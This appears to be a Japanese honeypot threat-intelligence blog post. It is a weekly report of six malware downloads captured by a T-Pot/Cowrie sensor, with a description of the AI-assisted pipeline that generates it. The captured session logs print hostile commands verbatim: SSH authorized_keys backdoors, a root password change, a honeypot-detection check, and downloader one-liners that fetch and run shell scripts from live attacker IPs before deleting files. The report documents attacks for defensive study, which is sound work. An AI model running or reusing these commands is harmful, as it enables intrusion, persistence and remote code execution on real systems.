T-Pot cowireマルウェア週次レポート (2025-09-01)

T-Pot
スポンサーリンク

この記事で公開されている情報は、情報セキュリティに関する技術的な研究および教育を目的として提供されています。掲載されているIPアドレス、ハッシュ値、その他の技術的指標(IOCs)は、著者が管理するハニーポットシステムによって自動的に収集されたものであり、その情報の正確性、完全性、安全性を保証するものではありません。本記事で提供される情報を、許可なく他者のシステムへの攻撃、マルウェアの拡散、その他いかなる違法行為にも使用しないでください。また、記載されているIPアドレスへのアクセス、マルウェアサンプルのダウンロードおよび実行は、ご自身の責任と管理下にある隔離された安全な環境でのみ行ってください。著者は、本記事の情報を利用したことによって生じるいかなる直接的または間接的な損害についても、一切の責任を負いません。

T-Potハニーポットに標準で搭載されているSSH/Telnetハニーポット「Cowrie」は、攻撃者がどのような認証情報を試行し、どのような手口で侵入を試みるかを詳細に記録するための「おとり」として設計されています。
そのため、デフォルトでは多くの一般的なユーザー名とパスワードの組み合わせで意図的にログインが「成功」するようになっており、攻撃者に侵入が成功したと錯覚させ、その後の行動を記録・分析します。
このレポートでは、そのようにして収集された攻撃の中から、マルウェアがダウンロードされた事例を分析します。

記事の舞台裏:AIと自動化による脅威インテリジェンスの生成プロセス

この記事でご覧いただいているマルウェア分析レポートは、単に手動で文章を執筆したものではありません。これは、AIコーディングアシスタント「Cursor」を中核に据え、T-Potハニーポットが収集した生の脅威データを、価値あるインテリジェンスへと昇華させるための、完全に自動化された分析・レポート生成パイプラインの成果物です。このセクションでは、私が相棒である Gemini 2.5 Pro と共に、どのような試行錯誤を経てこのシステムを構築し、日々のレポートがどのようにして生み出されているのか、その技術的な舞台裏を詳しく解説します。

アーキテクチャ概要

全体の処理フローは、大きく分けて「データ収集・分析」「記事コンテンツ生成」「WordPressへの投稿」の3つのフェーズで構成されています。これらすべてが、自作のPythonスクリプト群によって連携し、自動で実行されます。

graph TD
    subgraph "Phase 1 データ収集・分析 (Pythonスクリプト)"
        A[T-Pot Elasticsearch] --> B{Cowrieログ検索};
        B --> C[セッションIDを特定];
        C -- "同一セッションで検索" --> D[認証試行ログ];
        C -- "同一セッションで検索" --> E[実行コマンド履歴];
        B -- "ハッシュ値で検索" --> F[VirusTotal API];
    end
graph TD
    subgraph "Phase 2 記事コンテンツ生成 (Cursor + Gemini 2.5 Pro)"
        G((収集された全データ)) --> H{AIによるコンテンツ生成};
        H -- "自然言語での要約" --> I[サマリー文章];
        H -- "構造データから可視化" --> J[Mermaidフロー図];
        H -- "全情報を構造化" --> K[リッチJSONファイル];
    end

    subgraph "Phase 3 投稿自動化 (Pythonスクリプト)"
        K --> L[記事HTMLコンテンツ構築];
        L --> M[WordPress REST API];
        M --> N[記事として公開];
    end

各ステップの詳細解説

1. 脅威の最前線:T-Potからのデータ収集

パイプラインの起点となるのは、24時間365日インターネットからの攻撃を待ち受けるT-Potハニーポットです。収集された膨大なログは、内部のElasticsearchにデータレイクとして蓄積されます。最初のスクリプト(malware_analyzer.py)の役割は、このデータレイクの中から、分析に値する「兆候」を見つけ出すことです。具体的には、SSH/TelnetハニーポットであるCowrieのログに絞り、cowrie.session.file_downloadというイベント、つまり攻撃者が何らかのファイルをダウンロードした記録をトリガーとして処理を開始します。

2. 点と線をつなぐ:セッションIDによる相関分析

マルウェアがダウンロードされたという事実だけでは、脅威の全体像は見えません。そこで最も重要になるのがセッションIDです。Cowrieは、一連のSSH/Telnetセッション(接続から切断まで)にユニークなIDを付与します。スクリプトは、このセッションIDをキーにしてElasticsearchを再度検索し、

  • cowrie.login.success / cowrie.login.failed: 攻撃者がどのIDとパスワードの組み合わせで侵入を試みたか。
  • cowrie.command.input: 侵入後にどのようなコマンドを実行したか。

という、攻撃者の足跡を時系列で復元します。これにより、断片的なログが「攻撃の物語」として再構築されるのです。

3. 脅威の解像度を高める:VirusTotalによる外部インテリジェンス連携

次に、ダウンロードされたファイルのSHA256ハッシュ値を使い、世界最大級の脅威情報プラットフォームであるVirusTotalのAPIに問い合わせを行います。これは、ローカルのログだけでは得られない、外部の知見を取り込む「エンリッチメント」のプロセスです。VirusTotalからは、数十社のアンチウイルスエンジンによる検知名、ファイルタイプ、一般的な脅威名、関連するタグといった、極めて価値の高い情報が返却されます。

4. AIによるインテリジェンスの生成:Gemini 2.5 Pro in Cursor

ここからが、AIアシスタントの真骨頂です。収集・整理された構造化データ(IPアドレス、実行コマンド、VirusTotalの分析結果など)を基に、私(Gemini 2.5 Pro)が人間にとって分かりやすいコンテンツを動的に生成します。

  • AIによる要約: 攻撃の出身国、成功した認証情報、マルウェアの脅威名といったキーポイントを抽出し、自然な日本語の解説文を自動生成します。
  • マーメイド図の生成: 攻撃のフローを一目で理解できるよう、マーメイド記法によるフロー図を動的に生成します。

最終的に、これらの生成コンテンツと収集した全ての生データを、後続の処理がしやすい単一のリッチなJSONファイルとして出力します。

5. パブリッシングの自動化:WordPressへの自動投稿

最後に、もう一つのスクリプト(post_article.py)が起動します。このスクリプトは、生成されたリッチJSONファイルを読み込み、タイトル、カテゴリ、タグ、そして動的に組み立てられた記事本文(要約、マーメイド図、<details>タグで折りたたまれた詳細レポートなど)をWordPress REST API経由で投稿します。これにより、分析から公開までの全プロセスが完全に自動化され、私は次の脅威の分析に集中することができるのです。

今週検出されたマルウェア

今週は合計で 6 件のユニークなマルウェアが検出されました。

1. a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2

このマルウェアは、**Vietnam** のIPアドレス (`171.244.134.x`) からの攻撃者によって設置されました。セッション中、`Username: root, Password: daemon` という認証情報でのログインが成功した記録があります。侵入後、攻撃者は不明なコマンド コマンドを使用して外部サーバーからこのマルウェアをダウンロードしました。
VirusTotalでは **29** のセキュリティベンダーがマルウェアとして検知しており、その脅威名は「**trojan.shell/malkey**」として分類されています。

graph TD
    A["攻撃者IP<br/>(171.244.134.x)"] -- "1回のログイン試行" --> B["Cowrieハニーポット"];
    B -- "19回のコマンド実行" --> B;
    B -- "マルウェアダウンロード" --> C["ファイル<br/>(SHA256: a8460f446b...)"];

========================================

SHA256: a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2
Detected at (UTC): 2025-08-25T18:59:12.618Z

— Attacker Information —
Source IP: 171.244.134.x
Country: Vietnam
ASN: AS7552 (Viettel Group)
Sensor ID: b2cf7dd25d21
Session ID: f177763fe2d9
Download URL: N/A
Saved as: dl/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2

— Login Attempts —
[SUCCESS] Username: root, Password: daemon

— Session Commands —
cd ~; chattr -ia .ssh; lockr -ia .ssh
cd ~ && rm -rf .ssh && mkdir .ssh && echo “ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr”>>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
cat /proc/cpuinfo | grep name | wc -l
echo “root:4FNEUUdlzIWX”|chpasswd|bash
rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
cat /proc/cpuinfo | grep name | head -n 1 | awk ‘{print $4,$5,$6,$7,$8,$9;}’
free -m | grep Mem | awk ‘{print $2 ,$3, $4, $5, $6, $7}’
ls -lh $(which ls)
which ls
crontab -l
w
uname -m
cat /proc/cpuinfo | grep model | grep name | wc -l
top
uname
uname -a
whoami
lscpu | grep Model
df -h | head -n 2 | awk ‘FNR == 2 {print $2;}’

— VirusTotal Analysis —
Malicious Detections: 29 / 76
Full Report: https://www.virustotal.com/gui/file/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2

[File Details]
File Type: HTML
File Size: 389 bytes
First Seen on VT: 2018-07-05 17:21:41 UTC
Common Names: 20250826-141437-66eabcb5d350-1-redir__root__ssh_authorized_keys, a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2, 20250824-164107-d5723c42ab99-1-redir__root__ssh_authorized_keys, 20250818-042641-c0ec64cd909f-1-redir__root__ssh_authorized_keys, 20250817-081431-68aee09b2263-1-redir__root__ssh_authorized_keys
Tags: html

[Popular Threat Classification]
Suggested Threat Label: trojan.shell/malkey

[Top Malicious Detections (max 10)]
– Lionic: Trojan.HTML.Shell.4!c
– MicroWorld-eScan: Trojan.Shell.Agent.V
– CTX: pem.trojan.shell
– CAT-QuickHeal: ShellScript.Trojan.44624
– ALYac: Trojan.Script.Shell
– VIPRE: Trojan.Shell.Agent.V
– K7AntiVirus: Trojan ( 0001140e1 )
– K7GW: Trojan ( 0001140e1 )
– Arcabit: Trojan.Shell.Agent.V
– TrendMicro-HouseCall: Trojan.SH.MALKEY.AA

2. 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b

このマルウェアは、**Vietnam** のIPアドレス (`171.244.134.x`) からの攻撃者によって設置されました。セッション中、`Username: root, Password: daemon` という認証情報でのログインが成功した記録があります。侵入後、攻撃者は不明なコマンド コマンドを使用して外部サーバーからこのマルウェアをダウンロードしました。
VirusTotalでは **0** のセキュリティベンダーがマルウェアとして検知しており、その脅威名は「**不明**」として分類されています。

graph TD
    A["攻撃者IP<br/>(171.244.134.x)"] -- "1回のログイン試行" --> B["Cowrieハニーポット"];
    B -- "19回のコマンド実行" --> B;
    B -- "マルウェアダウンロード" --> C["ファイル<br/>(SHA256: 01ba4719c8...)"];

========================================

SHA256: 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
Detected at (UTC): 2025-08-25T18:59:17.233Z

— Attacker Information —
Source IP: 171.244.134.x
Country: Vietnam
ASN: AS7552 (Viettel Group)
Sensor ID: b2cf7dd25d21
Session ID: f177763fe2d9
Download URL: N/A
Saved as: dl/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b

— Login Attempts —
[SUCCESS] Username: root, Password: daemon

— Session Commands —
cd ~; chattr -ia .ssh; lockr -ia .ssh
cd ~ && rm -rf .ssh && mkdir .ssh && echo “ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr”>>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
cat /proc/cpuinfo | grep name | wc -l
echo “root:4FNEUUdlzIWX”|chpasswd|bash
rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
cat /proc/cpuinfo | grep name | head -n 1 | awk ‘{print $4,$5,$6,$7,$8,$9;}’
free -m | grep Mem | awk ‘{print $2 ,$3, $4, $5, $6, $7}’
ls -lh $(which ls)
which ls
crontab -l
w
uname -m
cat /proc/cpuinfo | grep model | grep name | wc -l
top
uname
uname -a
whoami
lscpu | grep Model
df -h | head -n 2 | awk ‘FNR == 2 {print $2;}’

— VirusTotal Analysis —
Malicious Detections: 0 / 76
Full Report: https://www.virustotal.com/gui/file/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b

[File Details]
File Type: Text
File Size: 1 bytes
First Seen on VT: 2009-03-05 12:45:38 UTC
Common Names: aff_c, config, dependency_links.txt, mode-text.js, follow-trail
Tags: trusted, attachment, known-distributor, text, nsrl, long-sleeps, idle, legit, via-tor

3. 8a68d1c08ea31250063f70b1ccb5051db1f7ab6e17d46e9dd3cc292b9849878b

このマルウェアは、**Germany** のIPアドレス (`213.209.143.x`) からの攻撃者によって設置されました。セッション中、`Username: root, Password: Welcome` という認証情報でのログインが成功した記録があります。侵入後、攻撃者は不明なコマンド コマンドを使用して外部サーバーからこのマルウェアをダウンロードしました。
VirusTotalでは **0** のセキュリティベンダーがマルウェアとして検知しており、その脅威名は「**不明**」として分類されています。

graph TD
    A["攻撃者IP<br/>(213.209.143.x)"] -- "1回のログイン試行" --> B["Cowrieハニーポット"];
    B -- "1回のコマンド実行" --> B;
    B -- "マルウェアダウンロード" --> C["ファイル<br/>(SHA256: 8a68d1c08e...)"];

========================================

SHA256: 8a68d1c08ea31250063f70b1ccb5051db1f7ab6e17d46e9dd3cc292b9849878b
Detected at (UTC): 2025-08-27T03:15:38.588Z

— Attacker Information —
Source IP: 213.209.143.x
Country: Germany
ASN: AS214943 (Railnet LLC)
Sensor ID: 50405b61639e
Session ID: cba4b6e87e35
Download URL: N/A
Saved as: dl/8a68d1c08ea31250063f70b1ccb5051db1f7ab6e17d46e9dd3cc292b9849878b

— Login Attempts —
[SUCCESS] Username: root, Password: Welcome

— Session Commands —
chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo “ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629” > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a; echo -e “\x61\x75\x74\x68\x5F\x6F\x6B\x0A”;

— VirusTotal Analysis —
Malicious Detections: 0 / 76
Full Report: https://www.virustotal.com/gui/file/8a68d1c08ea31250063f70b1ccb5051db1f7ab6e17d46e9dd3cc292b9849878b

[File Details]
File Type: Powershell
File Size: 398 bytes
First Seen on VT: 2023-07-18 13:17:25 UTC
Common Names: 8a68d1c08ea31250063f70b1ccb5051db1f7ab6e17d46e9dd3cc292b9849878b, 8a68d1c08ea31250063f70b1ccb5051db1f7ab6e17d46e9dd3cc292b9849878b.unknown, 164.215.103.47-authorized_keys
Tags: powershell, long-sleeps, detect-debug-environment

4. 3cffacc9ab838f7252b0458ec3e289282a60c7c94200579c0b3e8d3f95dff54a

このマルウェアは、**Iran** のIPアドレス (`31.214.172.x`) からの攻撃者によって設置されました。セッション中、`Username: root, Password: zzzzzzzzzzz` という認証情報でのログインが成功した記録があります。侵入後、攻撃者は不明なコマンド コマンドを使用して外部サーバーからこのマルウェアをダウンロードしました。
VirusTotalでは **0** のセキュリティベンダーがマルウェアとして検知しており、その脅威名は「**不明**」として分類されています。

graph TD
    A["攻撃者IP<br/>(31.214.172.x)"] -- "1回のログイン試行" --> B["Cowrieハニーポット"];
    B -- "10回のコマンド実行" --> B;
    B -- "マルウェアダウンロード" --> C["ファイル<br/>(SHA256: 3cffacc9ab...)"];

========================================

SHA256: 3cffacc9ab838f7252b0458ec3e289282a60c7c94200579c0b3e8d3f95dff54a
Detected at (UTC): 2025-08-27T06:07:15.687Z

— Attacker Information —
Source IP: 31.214.172.x
Country: Iran
ASN: AS60976 (Parsan Lin Co. PJS)
Sensor ID: 50405b61639e
Session ID: 910cf23cdac7
Download URL: N/A
Saved as: dl/3cffacc9ab838f7252b0458ec3e289282a60c7c94200579c0b3e8d3f95dff54a

— Login Attempts —
[SUCCESS] Username: root, Password: zzzzzzzzzzz

— Session Commands —
; cpu=$(grep ‘model name’ /proc/cpuinfo 2>/dev/null || echo “”); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo “”); if [ -z “$cpu” ] || [ -z “$memtotal” ]; then; echo “honeypot”; else; echo “valid”; fi;
bash -c ‘; cpu_model=$(head -n1 /proc/cpuinfo | grep “model name” | cut -d “:” -f2 | xargs 2>/dev/null || echo “N/A”); cpu_cores=$(grep -c ^processor /proc/cpuinfo 2>/dev/null || echo “N/A”); mem_total=$(awk “/MemTotal/ {print \$2}” /proc/meminfo 2>/dev/null || echo “N/A”); mem_avail=$(awk “/MemAvailable/ {print \$2}” /proc/meminfo 2>/dev/null || echo “N/A”); disk_info=$(df -m / 2>/dev/null | awk “NR==2 {print \$2 \”MB-\” \$4 \”MB\”}” || echo “N/A-N/A”); uptime_info=$(awk “{print int(\$1/3600)\”h \”int((\$1%3600)/60)\”m\”}” /proc/uptime 2>/dev/null || echo “N/A”); whoami=$(id -un 2>/dev/null || echo “N/A”); echo “$whoami|$cpu_model|$cpu_cores|$mem_total|$mem_avail|$disk_info|$uptime_info”; ‘
head -n1 /proc/cpuinfo | grep “model name” | cut -d “:” -f2 | xargs 2>/dev/null || echo “N/A”
grep -c ^processor /proc/cpuinfo 2>/dev/null || echo “N/A”
awk “/MemTotal/ {print \$2}” /proc/meminfo 2>/dev/null || echo “N/A”
awk “/MemAvailable/ {print \$2}” /proc/meminfo 2>/dev/null || echo “N/A”
df -m / 2>/dev/null | awk “NR==2 {print \$2 \”MB-\” \$4 \”MB\”}” || echo “N/A-N/A”
awk “{print int(\$1/3600
id -un 2>/dev/null || echo “N/A”
; cpu_model=N/A; cpu_cores=N/A; mem_total=N/A; mem_avail=N/A; disk_info=N/A-N/A; uptime_info=N/A-N/A\”h \”int((\$1%3600)/60)\”m\”}” /proc/uptime 2>/dev/null || echo “N/A”); whoami=N/A; echo “$whoami|$cpu_model|$cpu_cores|$mem_total|$mem_avail|$disk_info|$uptime_info”;

— VirusTotal Analysis —
Malicious Detections: 0 / 76
Full Report: https://www.virustotal.com/gui/file/3cffacc9ab838f7252b0458ec3e289282a60c7c94200579c0b3e8d3f95dff54a

[File Details]
File Type: Text
File Size: 666 bytes
First Seen on VT: 2025-08-13 03:20:39 UTC
Common Names:
Tags: text

5. 1.sh

このマルウェアは、**Belarus** のIPアドレス (`37.215.2.x`) からの攻撃者によって設置されました。セッション中、`Username: user, Password: user` という認証情報でのログインが成功した記録があります。侵入後、攻撃者は`cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.111.248.238/1.sh; curl -O http://193.111.248.238/1.sh; chmod 777 1.sh; sh 1.sh; tftp 193.111.248.238 -c get 1.sh; chmod 777 1.sh; sh 1.sh; tftp -r 3.sh -g 193.111.248.238; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 193.111.248.238 2.sh 2.sh; sh 2.sh; rm -rf 1.sh 1.sh 3.sh 2.sh; rm -rf *` コマンドを使用して外部サーバーからこのマルウェアをダウンロードしました。
VirusTotalでは **36** のセキュリティベンダーがマルウェアとして検知しており、その脅威名は「**downloader.medusa/shell**」として分類されています。

graph TD
    A["攻撃者IP (37.215.2.x)"] -- "1回のログイン試行" --> B["Cowrieハニーポット"];
    B -- "1回のコマンド実行" --> B;
    B -- "マルウェアダウンロード" --> C["ファイル (SHA256: f7f4c64cbd...)"];

========================================

SHA256: f7f4c64cbd688223429dc68c443ba2d55f72a5bca3b0b295691b1b1728ff4769
Detected at (UTC): 2025-08-27T19:27:45.913Z

— Attacker Information —
Source IP: 37.215.2.x
Country: Belarus
ASN: AS6697 (Republican Unitary Telecommunication Enterprise Beltelecom)
Sensor ID: 50405b61639e
Session ID: 15d48c99876f
Download URL: http://193.111.248.238/1.sh
Saved as: dl/f7f4c64cbd688223429dc68c443ba2d55f72a5bca3b0b295691b1b1728ff4769

— Login Attempts —
[SUCCESS] Username: user, Password: user

— Session Commands —
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.111.248.238/1.sh; curl -O http://193.111.248.238/1.sh; chmod 777 1.sh; sh 1.sh; tftp 193.111.248.238 -c get 1.sh; chmod 777 1.sh; sh 1.sh; tftp -r 3.sh -g 193.111.248.238; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 193.111.248.238 2.sh 2.sh; sh 2.sh; rm -rf 1.sh 1.sh 3.sh 2.sh; rm -rf *

— VirusTotal Analysis —
Malicious Detections: 36 / 76
Full Report: https://www.virustotal.com/gui/file/f7f4c64cbd688223429dc68c443ba2d55f72a5bca3b0b295691b1b1728ff4769

[File Details]
File Type: Shell script
File Size: 3374 bytes
First Seen on VT: 2025-08-27 19:27:06 UTC
Common Names: 1.sh, f7f4c64cbd688223429dc68c443ba2d55f72a5bca3b0b295691b1b1728ff4769, 63b0cc63_1.sh
Tags: detect-debug-environment, checks-hostname, shell, self-delete

[Popular Threat Classification]
Suggested Threat Label: downloader.medusa/shell

[Top Malicious Detections (max 10)]
– Lionic: Trojan.Script.Medusa.a!c
– MicroWorld-eScan: Generic.Linux.Medusa.C.1A2D3BF9
– CTX: shell.downloader.shell
– CAT-QuickHeal: Trojan.Shell.Downloader.39008
– Skyhigh: Linux/Downloader.w
– ALYac: Generic.Linux.Medusa.C.1A2D3BF9
– Sangfor: Virus.Generic-Script.Save.ba1
– K7GW: Trojan ( 004102a21 )
– Symantec: Scr.Malcode!gen107
– ESET-NOD32: Linux/TrojanDownloader.SH.ECT

6. 1.sh

このマルウェアは、**Belarus** のIPアドレス (`37.215.2.x`) からの攻撃者によって設置されました。セッション中、`Username: service, Password: service` という認証情報でのログインが成功した記録があります。侵入後、攻撃者は`cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.176.94.6/1.sh; curl -O http://185.176.94.6/1.sh; chmod 777 1.sh; sh 1.sh; tftp 185.176.94.6 -c get 1.sh; chmod 777 1.sh; sh 1.sh; tftp -r 3.sh -g 185.176.94.6; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 185.176.94.6 2.sh 2.sh; sh 2.sh; rm -rf 1.sh 1.sh 3.sh 2.sh; rm -rf *` コマンドを使用して外部サーバーからこのマルウェアをダウンロードしました。
VirusTotalでは **38** のセキュリティベンダーがマルウェアとして検知しており、その脅威名は「**downloader.medusa/shell**」として分類されています。

graph TD
    A["攻撃者IP<br/>(37.215.2.x)"] -- "1回のログイン試行" --> B["Cowrieハニーポット"];
    B -- "1回のコマンド実行" --> B;
    B -- "マルウェアダウンロード" --> C["ファイル<br/>(SHA256: 542e2348e5...)"];

========================================

SHA256: 542e2348e56c6174132d534f2fc8bb2c5bb7e9c5b2a6f360ddad9cbe720457b3
Detected at (UTC): 2025-08-30T09:39:39.193Z

— Attacker Information —
Source IP: 37.215.2.x
Country: Belarus
ASN: AS6697 (Republican Unitary Telecommunication Enterprise Beltelecom)
Sensor ID: d676529f4ebe
Session ID: e99e7cdd1ac8
Download URL: http://185.176.94.6/1.sh
Saved as: dl/542e2348e56c6174132d534f2fc8bb2c5bb7e9c5b2a6f360ddad9cbe720457b3

— Login Attempts —
[SUCCESS] Username: service, Password: service

— Session Commands —
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.176.94.6/1.sh; curl -O http://185.176.94.6/1.sh; chmod 777 1.sh; sh 1.sh; tftp 185.176.94.6 -c get 1.sh; chmod 777 1.sh; sh 1.sh; tftp -r 3.sh -g 185.176.94.6; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 185.176.94.6 2.sh 2.sh; sh 2.sh; rm -rf 1.sh 1.sh 3.sh 2.sh; rm -rf *

— VirusTotal Analysis —
Malicious Detections: 38 / 76
Full Report: https://www.virustotal.com/gui/file/542e2348e56c6174132d534f2fc8bb2c5bb7e9c5b2a6f360ddad9cbe720457b3

[File Details]
File Type: Shell script
File Size: 2929 bytes
First Seen on VT: 2025-08-30 00:07:16 UTC
Common Names: 1.sh, 92e9be03_1.sh, 381487611
Tags: detect-debug-environment, shell, checks-hostname

[Popular Threat Classification]
Suggested Threat Label: downloader.medusa/shell

[Top Malicious Detections (max 10)]
– Lionic: Trojan.Script.Medusa.a!c
– MicroWorld-eScan: Generic.Linux.Medusa.C.CD32A264
– CTX: shell.downloader.shell
– CAT-QuickHeal: Trojan.Shell.Downloader.39008
– Skyhigh: Linux/Downloader.w
– ALYac: Generic.Linux.Medusa.C.CD32A264
– Sangfor: Virus.Generic-Script.Save.ba1
– K7GW: Trojan ( 004102a21 )
– Symantec: Scr.Malcode!gen107
– ESET-NOD32: Linux/TrojanDownloader.SH.BFM

スポンサーリンク

コメント

タイトルとURLをコピーしました